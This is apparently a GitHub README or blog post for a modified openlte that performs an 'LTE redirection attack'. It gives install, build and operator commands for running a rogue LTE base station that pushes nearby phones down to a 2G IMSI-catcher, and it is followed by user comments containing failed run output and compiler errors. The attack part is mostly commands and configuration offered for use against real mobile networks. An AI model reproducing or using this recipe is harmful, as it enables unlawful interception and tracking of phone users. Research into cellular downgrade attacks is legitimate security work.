bbaranoff / openlte
License: GNU Affero General Public License v3.0
LTE Redirection Attack

Updated with https://github.com/bbaranoff/openlte2GSM (easy install, tested on Ubuntu 20.04.3 and against Android 11).

Posted on 1 December 2019 by bastienbaranoff. Category: Mobiles Networks Hacking

This is a redirect attack from Long Term Evolution (LTE, 4G) to the Global System for Mobile Communications (GSM, 2G). Article in progress.

Install From Scratch

Tested with:

- LimeSDR-Mini + 2 Motorola (C1XX series, osmocom-bb compatible), or
- BladeRF-xA4 + 2 Motorola, or
- BladeRF-xA4 + LimeSDR-Mini

Kali Linux 2019.4 (Gnome AMD64) (Docker)

Install the dependencies:

    apt update
    apt upgrade
    apt install build-essential libgmp-dev libx11-6 libx11-dev flex libncurses5 \
        libncurses5-dev libncursesw6 libpcsclite-dev zlib1g-dev libmpfr6 libmpc3 \
        lemon aptitude libtinfo-dev libtool shtool autoconf git-core pkg-config \
        make libmpfr-dev libmpc-dev libtalloc-dev libfftw3-dev libgnutls28-dev \
        libssl1.0-dev libtool-bin libxml2-dev sofia-sip-bin libsofia-sip-ua-dev \
        sofia-sip-bin libncursesw5-dev bison libgmp3-dev alsa-oss asn1c \
        libdbd-sqlite3 libboost-all-dev libusb-1.0-0-dev python-mako python3-mako \
        doxygen python-docutils cmake build-essential g++ libpython-dev \
        python-numpy python3-numpy swig libsqlite3-dev libi2c-dev \
        libwxgtk3.0-gtk3-dev freeglut3-dev composer phpunit python3-pip python-pip
    pip install requests
    pip3 install requests

4G Redirect

Clone or download the necessary repositories:

    git clone https://github.com/ettusresearch/uhd        # tested with checkout dbaf4132f
    git clone https://github.com/pothosware/SoapySDR      # tested with checkout 67abec9
    git clone https://github.com/nuand/BladeRF            # necessary even if you don't have a blade; tested with checkout f03d8433
    git clone https://github.com/pothosware/SoapyBladeRF  # only if you have a BladeRF; tested with checkout 1c1e8aa
    git clone https://github.com/pothosware/SoapyUHD      # tested with checkout 7371e68
    git clone https://github.com/myriadrf/LimeSuite       # only if you have a LimeSDR; tested with checkout a5b3a10f
    git clone https://github.com/gnuradio/gnuradio        # tested with checkout 8e2808513
    git clone https://github.com/osmocom/gr-osmosdr       # tested with checkout 4d83c60
    wget https://tls.mbed.org/download/polarssl-1.3.7-gpl.tgz && tar zxvf polarssl-1.3.7-gpl.tgz
    git clone https://github.com/bbaranoff/openlte        # tested with checkout 4bd673b

Compilation (compile in the same order as the git clones and downloads above):

    cd dir_to_compile
    git submodule init && git submodule update   # only for gnuradio
    cd host                                      # only for uhd
    mkdir build
    cd build
    cmake ..
    make -j$(nproc)
    make install
    ldconfig

Then build the 2G IMSI-catcher (see Build IMSI-catcher).

Running Phone in 2G/3G/4G mode

This article is in progress and is just a PoC.

The attack steps are: run the IMSI-catcher on ARFCN 514 (see Build IMSI-catcher), then run the 4G redirector as follows.

Shell #1:

    LTE_fdd_enodeb

Shell #2:

    telnet localhost 30000
    write rx_gain 30
    write tx_gain 80
    write mcc 215
    write mnc 15
    write band 7
    write dl_earfcn 3350

(Change these to your UE's values, and be careful that the EARFCN is within the band.)

Then switch the phone to airplane mode and, in localhost:30000 (Shell #2), enter:

    start

Wait… and when you get the “ok” answer in Shell #2, remove airplane mode and … enjoy!

See https://pl4y.store/index.php/2019/12/01/lte-redirection-attack/
Please introduce more about the workflow of redirecting the phone from LTE to GSM. I read the code in LTE_fdd_enb_mme.cc and did not find the related content. Is there a need for additional programming? Thanks!
When I use bladerf for LTE redirection, it is displayed in shell2 as follows:
telnet localhost 30000
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
*** LTE FDD ENB ***
Type help to see a list of commands
rx_gain 30
fail "invalid command"
write rx_gain 30
ok
write tx_gain 80
ok
write mcc 460
ok
write mnc 00
ok
write band 40
ok
write dl_earfcn 38950
ok
start
fail "cant start"
Displayed in shell1:
LTE_fdd_enodeb
*** LTE FDD ENB ***
Please connect to control port 30000
[INFO] [UHD] linux; GNU C++ version 9.3.0; Boost_107100; UHD_3.15.0.HEAD-0-gdbaf4132
[INFO @ host/libraries/libbladeRF/src/helpers/version.c:79] Firmware version (v2.4.0) is newer than entries in libbladeRF's compatibility table. Please update libbladeRF if problems arise.
[INFO @ host/libraries/libbladeRF/src/helpers/version.c:103] FPGA version (v0.14.0) is newer than entries in libbladeRF's compatibility table. Please update libbladeRF if problems arise.
I wonder if it's the bladerf problem? The bladerf version is as follows:
bladeRF> version
bladeRF-cli version: 1.8.0-git-f03d8433
libbladeRF version: 2.2.1-git-f03d8433
Firmware version: 2.4.0-git-a3d5c55f
FPGA version: 0.14.0 (configured from SPI flash)
[ 83%] Building CXX object LTE_fdd_dl_file_scan/CMakeFiles/_LTE_fdd_dl_fs.dir/src/LTE_fdd_dl_fsPYTHON_wrap.cxx.o
LTE_fdd_enb_radio.cc: In member function ‘LTE_FDD_ENB_ERROR_ENUM LTE_fdd_enb_radio_bladerf::setup(uint32, double, int16, int16, uint8, uint32, uint32)’:
LTE_fdd_enb_radio.cc:830:52: error: invalid conversion from ‘int’ to ‘bladerf_channel_layout’ [-fpermissive]
In file included from /home/enha/apps/lteAttack/LTE_fdd_enodeb/hdr/LTE_fdd_enb_radio.h:56:0,
from LTE_fdd_enb_radio.cc:63:
/usr/local/include/libbladeRF.h:2577:15: note: initializing argument 2 of ‘int bladerf_sync_config(bladerf*, bladerf_channel_layout, bladerf_format, unsigned int, unsigned int, unsigned int, unsigned int)’
int CALL_CONV bladerf_sync_config(struct bladerf *dev,
^
LTE_fdd_enb_radio.cc:850:52: error: invalid conversion from ‘int’ to ‘bladerf_channel_layout’ [-fpermissive]
In file included from /home/enha/apps/lteAttack/LTE_fdd_enodeb/hdr/LTE_fdd_enb_radio.h:56:0,
from LTE_fdd_enb_radio.cc:63:
/usr/local/include/libbladeRF.h:2577:15: note: initializing argument 2 of ‘int bladerf_sync_config(bladerf*, bladerf_channel_layout, bladerf_format, unsigned int, unsigned int, unsigned int, unsigned int)’
int CALL_CONV bladerf_sync_config(struct bladerf *dev,
^
LTE_fdd_enb_radio.cc: In member function ‘void LTE_fdd_enb_radio_bladerf::receive(LTE_FDD_ENB_RADIO_PARAMS_STRUCT)’:
LTE_fdd_enb_radio.cc:977:76: error: invalid conversion from ‘int’ to ‘bladerf_direction’ [-fpermissive]
In file included from /home/enha/apps/lteAttack/LTE_fdd_enodeb/hdr/LTE_fdd_enb_radio.h:56:0,
from LTE_fdd_enb_radio.cc:63:
/usr/local/include/libbladeRF.h:2503:15: note: initializing argument 2 of ‘int bladerf_get_timestamp(bladerf*, bladerf_direction, bladerf_timestamp*)’
int CALL_CONV bladerf_get_timestamp(struct bladerf *dev,
^
LTE_fdd_enodeb/CMakeFiles/LTE_fdd_enodeb.dir/build.make:302: recipe for target 'LTE_fdd_enodeb/CMakeFiles/LTE_fdd_enodeb.dir/src/LTE_fdd_enb_radio.cc.o' failed
make[2]: *** [LTE_fdd_enodeb/CMakeFiles/LTE_fdd_enodeb.dir/src/LTE_fdd_enb_radio.cc.o] Error 1
make[2]: *** 正在等待未完成的任务....
CMakeFiles/Makefile2:961: recipe for target 'LTE_fdd_enodeb/CMakeFiles/LTE_fdd_enodeb.dir/all' failed
make[1]: *** [LTE_fdd_enodeb/CMakeFiles/LTE_fdd_enodeb.dir/all] Error 2
make[1]: *** 正在等待未完成的任务....
[ 85%] Linking CXX shared module _LTE_fdd_dl_fg.so
[ 86%] Linking CXX shared module _LTE_fdd_dl_fs.so
[ 88%] Built target _LTE_fdd_dl_fg
[ 91%] Built target _LTE_fdd_dl_fs
Makefile:138: recipe for target 'all' failed
make: *** [all] Error 2